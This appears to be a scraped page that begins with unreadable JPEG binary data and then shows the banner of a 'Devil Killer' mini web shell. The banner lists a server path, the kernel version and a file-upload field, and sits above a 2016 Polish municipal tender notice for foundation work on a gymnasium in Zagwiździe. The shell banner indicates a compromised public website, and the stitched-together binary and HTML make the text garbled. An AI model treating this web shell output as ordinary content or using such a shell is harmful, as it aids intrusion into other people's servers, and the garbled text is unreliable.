JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161013/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161013/322792-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='www.bp.murow.pl' target='_blank'>www.bp.murow.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 322792 - 2016
              z dnia 2016-10-13 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Murów: Budowa sali gimnastycznej z zapleczem socjalnym i łącznikiem do Publicznego Gimnazjum w Zagwiździu przy ul. Lipowej 68 -ETAP I Przygotowanie terenu pod budowę, roboty ziemne i fundamentowe. <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Murów, krajowy numer identyfikacyjny
              53141317100000, ul.
              ul. Dworcowa 
              2,
              46030  
              Murów, woj.
              opolskie, państwo
              Polska, tel.
              0-77 4214034, e-mail
              , faks
              0-77 4214032.
              <br />
              Adres strony internetowej (URL): <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.bip.urow.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bp.murow.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie pod rygorem nieważności za pśrednictwem operatora pocztowego, osobiście lub za pośenictwem kuriera<br />
                Adres:
                <br />Urząd Gminy w Mrowie ul. Dworcowa 2 46-030 Murów</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Budowa sali gimnastycznej z zapleczem socjalnym i łącznikiem do Publicznego Gimnazjum w Zagwiździu przy ul. Lipowej 68 -ETAP I Przygotowanie terenu pod budowę, roboty ziemne i fundamentowe. <br /><b>Numer referencyjny: </b>Zp. 271.6.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.Przedmiotem zamówienia jest
 wykonanie robót przygotowawczych, ziemnych oraz fundamentowych pod budowę sali gimnastycznej z zapleczem socjalnym oraz łącznikiem do Publicznego Gimnazjum w Zagwiździu zgodnie z dokumentacją projektową stanowiącą załącznik do SIWZ. 
	Nieruchomość planowana do zabudowy obejmuje działki o numerach ewidencyjnych 612/4 i 614/3 z karty mapy 3, obręb ewidencyjny 0352 Zagwiździe, jednostka ewidencyjna 160906_2 Murów. Obiekt sportowy będzie zlokalizowany w północnej części przedmiotowych działek. Budynek został zaprojektowany jako jednokondygnacyjny, niepodpiwniczony.
	Fundamenty należy wykonać jako żelbetowe z betonu oraz prętów stalowych zgodnie z opracowaniem rysunkowym. Pręty zbrojeniowe słupów oraz rdzeni żelbetowych należy wypuścić ze stóp i ław fundamentowych, gdyż będą one traktowane jako pręty startowe dla wykonanie przyszłej konstrukcji budynku sali gimnastycznej. 
	
Charakterystyczne parametry inwestycji:
- długość max.		  - 134,71 [m]
- szerokość max. 	  - 207,22 [m]
- powierzchnia zabudowy	- 1 841,04 [m2]

Zakres prac obejmuje:
obsługę geodezyjną:
     - wytyczenie geodezyjne terenu inwestycji;
roboty przygotowawcze i rozbiórkowe:
    - tymczasowe ogrodzenie terenu inwestycji;
    - rozbiórka wolnostojącego budynku gospodarczego;
      - wycinka drzew  1 szt.;
      - organizacja placu budowy;
roboty ziemne:
     - usunięcie humusu;
     - wykonanie wykopów pod ławy i stopy fundamentowe;
     - niwelacja i uporządkowanie terenu po zakończeniu robót; 
roboty ogólnobudowlane:
     - wykonanie żelbetowych ław, stóp i ścian fundamentowych;
     - wykonanie izolacji przeciwwilgociowej fundamentów;
     - wykonanie izolacji termicznej ścian fundamentowych ze styropianu ekstrudowanego;
roboty dodatkowe:
     - wywóz odpadów i nadwyżki urobku na składowisko odpadów.
Wykonawca zobowiązany jest do zapewnienia nadzoru na budowie przez osoby z odpowiednimi uprawnieniami, prowadzenie dziennika budowy, wykonania protokołów częściowych, przygotowania dokumentów dotyczących jakości wbudowanych materiałów - świadectwa jakości i certyfikaty wydane przez dostawców materiałów i urządzeń. 
Szczegółowy zakres robót jest określony w projekcie budowlanym architektury i konstrukcji opracowanym przez Machura Projekt Biuro Konstrukcji i Architektury inż. Łukasz Machura  opracowanie zbiorowe z kwietnia 2016 roku, Specyfikacjach Technicznych Wykonania i Odbioru Robót stanowiących załączniki do niniejszej dokumentacji przetargowej.
Na realizację przedmiotowego zadania została wydana przez Starostę Opolskiego decyzja o pozwoleniu na budowę nr 309/2016 z dnia 10 maja 2016 roku.

2.Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie   
innych materiałów i urządzeń niż podane w dokumentacji projektowej pod warunkiem  zapewnienia parametrów nie gorszych   niż określone w tej dokumentacji oraz uzyskania akceptacji autora projektu. W takiej sytuacji Zamawiający wymaga złożenia stosownych  dokumentów, uwiarygodniających te materiały. Wykonawca, który powołuje się na   rozwiązania równoważne opisanym przez Zamawiającego  jest obowiązany wykazać, że oferowane przez niego urządzenia i materiały spełniają wymagania określone przez 
 Zamawiającego. Złożone wyżej wskazane dokumenty będą podlegały ocenie przez autora  dokumentacji projektowej , który sporządzi stosowną opinię. Opinia ta będzie podstawą  do podjęcia przez Zamawiającego decyzji o odrzuceniu oferty z powodu    nierównoważności zaproponowanych  zamienników. W przypadku zastosowania innych  materiałów lub urządzeń Wykonawca, którego ofertę uznano za najkorzystniejszą zobowiązany jest: na własny koszt i ryzyko oraz własnym staraniem uzyskać zgodę Autora 
 Projektu na proponowane zmiany i w razie potrzeby opracować zamienną dokumentację  projektową, dokonać niezbędnych uzgodnień i przeprowadzić wymagane Prawem  budowlanym zmiany. W przypadku nie dołączenia dokumentów uwiarygadniających zastosowanie urządzeń i 
    materiałów równoważnych Zamawiający uzna, że Wykonawca przedstawił w ofercie 
    urządzenia i materiały opisane w dokumentacji projektowej. Pod pojęciem parametry 
    rozumie się funkcjonalność, przeznaczenie , kolorystykę, strukturę, materiały, kształt, 
   wielkość, bezpieczeństwo i wytrzymałość.
   Wszystkie nazwy własne materiałów i urządzeń użyte w dokumentacji przetargowej są   
    podane  jedynie przykładowo i określają jedynie minimalne parametry jakościowe oraz 
    wymagany standard. We wszystkich miejscach Specyfikacji Istotnych Warunków 
    Zamówienia oraz w załącznikach do SIWZ , w których wskazano konkretnego producenta 
    lub nazwę własną materiałów, zamawiający dodaje zapis lub równoważne.
<br /><br /><b>II.5) Główny kod CPV: </b>45212222-8<br /><b> Dodatkowe kody CPV:</b>45111000-1,
                45320000-6,
                45100000-8<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 05/12/2016<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie precyzuje szczegółowych wymagań w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie precyzuje szczegółowego warunku w tym zakresie.Przed terminem podpisania umowy Wykonawca wyłoniony w przetargu zobowiązany jest przedstawić opłaconą polisę a w przypadku jej braku, innego dokumentu potwierdzającego, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 150.000,00zł.
            Wykonawca jest zobowiązany utrzymywać limit maksymalnej kwoty ubezpieczenia o 
            której mowa powyżej, przez cały okres obowiązywania umowy. 
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                dysponuje osobami odpowiedzialnymi za realizację zamówienia:
Wykonawca zobowiązany jest wskazać, że dysponuje:kierownikiem  budowy branży konstrukcyjno- budowlanej -zobowiązany jest  posiadać uprawnienia budowlane bez ograniczeń do kierowania robotami w  specjalności konstrukcyjno-budowlanej ( lub im odpowiadające) oraz co najmniej 5- letnie doświadczenie w pełnieniu samodzielnych funkcji w budownictwie. Ww. osoba zobowiązana jest  przynależeć do właściwych izb samorządu  
 zawodowego.

<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w niniejszym postępowaniu Zamawiający żąda następujących dokumentów:
1)odpisu z właściwego rejestru lub z  centralnej ewidencji i informacji o  działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub  ewidencji, w celu potwierdzenia braku podstaw do wykluczenia na podstawie art.  24 ust. 5 pkt 1 ustawy 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia   dokument ten składa każdy z Wykonawców oddzielnie.
2)W przypadku powoływania się na zasoby innego podmiotu Wykonawca w celu  wykazania braku istnienia wobec niego podstaw wykluczenia oraz spełnienia w zakresie w jakim powołuje się na jego zasoby, warunków udziału w postępowaniu, zamieszcza o tym podmiocie informację w oświadczeniu o którym mowa w Rozdziale 6.1 oraz załącza odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej podmiotu trzeciego, w celu potwierdzenia braku podstaw do wykluczenia podmiotu trzeciego art. 24 ust. 5 pkt.1) ustawy Pzp. 
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskie, w odniesieniu do wymaganych dokumentów, stosuje się przepisy rozporządzenia Ministra Rozwoju z 26 lipca 2016 roku w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy w postępowaniu o udzielenie zamówienia ( Dz.U. poz.1126).
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada następujące dokumenty:
Zamiast dokumentu określonego w Rozdziale 6. 8 pkt. 1) SIWZ składa dokument  lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokumenty powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju w którym Wykonawca ma siedzibę lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w Rozdziale 6.1 zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument  miał dotyczyć, złożone przed notariuszem lub organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce zamieszkania tej osoby. Dokumenty i oświadczenia powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski , poświadczonym przez Wykonawcę.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1)wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami ( załącznik nr 3 do SIWZ)<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br />Nie dotyczy.</div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1)Wypełniony i podpisany formularz oferty ( zgodnie z załącznikiem nr 1 do SIWZ)
2)Pełnomocnictwo(a)  w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru.
3)W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.
4)Dokument potwierdzający wniesienie wadium,
5)W przypadku powoływania się na zasoby innego podmiotu Wykonawca składa oryginał pisemnego zobowiązania podmiotu, na którego zasoby się powołuje do udostępnienia swoich zasobów na potrzeby realizacji przedmiotowego zamówienia (zgodnie z załącznikiem nr 5 do SIWZ.)

</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />     1.  Zamawiający wymaga wniesienia wadium.
      Ustala się wadium w wysokości: 7.000,00PLN (słownie: siedem tysięcy 00/100)
 2.  Wadium należy wnieść przed terminem składania ofert, określonego  w Rozdziale  
      13 niniejszej SIWZ tj. do dnia 28 października 2016r godz. 10:00, przy czym za termin 
       wniesienia  wadium w formie pieniężnej za  pomocą przelewu bankowego  
      Zamawiający będzie  uważał za  skuteczne tylko wówczas, gdy bank prowadzący  
       rachunek  Zamawiającego  potwierdzi, że otrzymał taki przelew   przed upływem 
       terminu  składania ofert.
 3.   Wadium może być wnoszone w jednej lub kilku następujących formach:
              1)    w pieniądzu,
              2)     w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-   
                      kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem    pieniężnym,
           3)     w gwarancjach bankowych
           4)    w gwarancjach ubezpieczeniowych,
           5)  w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 
                   5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji 
                   Rozwoju  Przedsiębiorczości ( Dz. U. Nr 109, poz. 1158, z późn. zm).

Wadium wnoszone w pieniądzu wpłaca się PRZELEWEM na rachunek bankowy   
Zamawiającego Bank  Spółdzielczy Łubniany  Nr  21 8897 0004 2001 0006 0163 0003  z  dopiskiem Wadium  Sala gimnastyczna z zapleczem socjalnym i łącznikiem do Publicznego Gimnazjum w Zagwiździu przy ul. Lipowej 68-ETAP I Pprzygotowanie terenu pod budowę, roboty ziemne i fundamentowe. 
Do oferty należy dołączyć kopię polecenia przelewu lub kserokopię potwierdzoną za     zgodność z oryginałem- przez osoby odpowiednio upoważnione do reprezentowania.
Wadium wnoszone w formie poręczeń lub gwarancji winno być złożone w oryginale.
Oryginał dokumentu należy złożyć w oddzielnej kopercie załączonej do oferty a jego kopia w ofercie.        
Oferta nie zabezpieczona wadium w jednej lub kilku z podanych wyżej form zostanie wykluczona bez rozpatrywania.
4. Wadium składane w formie gwarancji i/lub poręczenia, gwarancja i/lub poręczenie   
      powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać, między 
      innymi następujące elementy: 
       1)   nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji i/lub poręczenia 
             (Zamawiającego),gwaranta i/lub poręczyciela (banku lub instytucji ubezpieczeniowej      
             udzielających gwarancji i/lub poręczenia) oraz wskazanie ich siedzib.
      2)   dokładne przytoczenie nazwy i przedmiotu niniejszego postępowania
      3)  precyzyjne określenie wierzytelności, która ma być zabezpieczona gwarancją i/lub 
             poręczeniem,
      4)    kwotę gwarancji i/lub poręczenia,
      5)    termin ważności gwarancji i/lub poręczenia 
      6)  zobowiązanie gwaranta i/lub poręczyciela do: nieodwołalnego i bezwarunkowego 
             zapłacenia kwoty gwarancji i/lub poręczenia na pierwsze pisemne żądanie 
             Zamawiającego zawierającego oświadczenie, iż:
